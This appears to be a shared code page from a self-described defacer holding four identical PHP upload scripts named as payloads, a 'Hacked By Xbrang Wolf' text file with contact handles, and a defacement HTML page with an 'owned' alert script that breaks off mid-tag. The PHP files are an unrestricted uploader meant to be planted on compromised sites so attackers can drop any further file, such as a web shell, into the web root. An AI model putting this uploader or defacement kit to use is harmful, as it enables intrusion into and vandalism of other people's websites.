Instantly share code, notes, and snippets.

View OsComPayLoad.php
<?php if(isset($_FILES["userfile"]["name"])){ $uploaddir = getcwd() . "/"; $uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]); echo "<p>"; if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) { echo "Upload Successful\n"; } else { echo "Failed To Upload";} echo "</p>"; echo "<pre>"; echo "Information :\n"; echo "Your Directory Is :"; echo getcwd() . "\n"; print_r($_FILES); if ($_FILES["userfile"]["error"] == 0){ echo "<br><br><a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}</a><br><br>"; echo getcwd() . "\n"; } echo "</pre>"; } echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">"; echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />"; echo "Select Your File : <input name=\"userfile\" type=\"file\" />"; echo "<input type=\"submit\" value=\"Upload\" />"; echo "</form>"; echo "Spider Project"; exit; ?>
View vuln.php
<?php if(isset($_FILES["userfile"]["name"])){ $uploaddir = getcwd() . "/"; $uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]); echo "<p>"; if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) { echo "Upload Successful\n"; } else { echo "Failed To Upload";} echo "</p>"; echo "<pre>"; echo "Information :\n"; echo "Your Directory Is :"; echo getcwd() . "\n"; print_r($_FILES); if ($_FILES["userfile"]["error"] == 0){ echo "<br><br><a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}</a><br><br>"; echo getcwd() . "\n"; } echo "</pre>"; } echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">"; echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />"; echo "Select Your File : <input name=\"userfile\" type=\"file\" />"; echo "<input type=\"submit\" value=\"Upload\" />"; echo "</form>"; echo "Spider Project"; exit; ?>
View vuln.txt
Hacked By Xbrang Wolf
Skype: xbrang wolf
fb.com/xbrang.wolf
View xbrang.php
<?php if(isset($_FILES["userfile"]["name"])){ $uploaddir = getcwd() . "/"; $uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]); echo "<p>"; if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) { echo "Upload Successful\n"; } else { echo "Failed To Upload";} echo "</p>"; echo "<pre>"; echo "Information :\n"; echo "Your Directory Is :"; echo getcwd() . "\n"; print_r($_FILES); if ($_FILES["userfile"]["error"] == 0){ echo "<br><br><a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}</a><br><br>"; echo getcwd() . "\n"; } echo "</pre>"; } echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">"; echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />"; echo "Select Your File : <input name=\"userfile\" type=\"file\" />"; echo "<input type=\"submit\" value=\"Upload\" />"; echo "</form>"; echo "Spider Project"; exit; ?>
View up.php
<?php if(isset($_FILES["userfile"]["name"])){ $uploaddir = getcwd() . "/"; $uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]); echo "<p>"; if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) { echo "Upload Successful\n"; } else { echo "Failed To Upload";} echo "</p>"; echo "<pre>"; echo "Information :\n"; echo "Your Directory Is :"; echo getcwd() . "\n"; print_r($_FILES); if ($_FILES["userfile"]["error"] == 0){ echo "<br><br><a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}</a><br><br>"; echo getcwd() . "\n"; } echo "</pre>"; } echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">"; echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />"; echo "Select Your File : <input name=\"userfile\" type=\"file\" />"; echo "<input type=\"submit\" value=\"Upload\" />"; echo "</form>"; echo "Spider Project"; exit; ?>
View ma.htm
<title>Owned By Xbrang Wolf</title>
<script> alert('0wn3d By Xbrang') </script>
<html>
<link rel="icon" type="image/gif" href="https://seeklogo.com/images/M/Morocco-logo-2CFC6968B1-seeklogo.com.png">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body style='text-align:center;background-color:black;font-family:Candara;' >
<img src="https://www.aljazeera.com/mritems/Images/2014/12/30/2014123073715889734_20.jpg" style="height:400;width:400;"/>
<div style='color:white;font-size:28px;'>